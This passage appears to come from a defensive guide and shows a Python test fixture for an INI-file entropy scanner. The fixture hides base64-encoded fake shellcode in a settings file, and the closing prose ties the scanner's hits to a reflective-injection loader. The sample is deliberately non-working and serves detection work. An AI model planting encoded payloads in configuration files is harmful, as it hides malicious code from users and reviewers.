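_FAKE_SHELLCODE = b"\xfc\x48\x83\xe4\xf0" + bytes((i * 37 + 11) % 256 for i in range(300))
_BLOB = base64.b64encode(_FAKE_SHELLCODE).decode()
_BANNER = "-" * 80                  # long but low-entropy, must not be flagged
SAMPLE_INI = f"""[Settings]
server = 203.0.113.5
theme = dark
license = ABCD-EFGH-IJKL-MNOP
banner = {_BANNER}

[Data]
payload = {_BLOB}
"""

if __name__ == "__main__":
    for hit in scan_ini(SAMPLE_INI):
        print(hit)
```

Expect false positives from embedded certificates, licence blobs and compressed settings; the entropy hit is a lead to pair with the process that reads the file, which for Catena is the loader that performs the reflective injection.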